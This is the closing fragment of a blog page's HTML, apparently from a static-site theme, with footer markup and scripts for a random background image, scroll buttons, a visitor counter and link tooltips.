                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 5;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>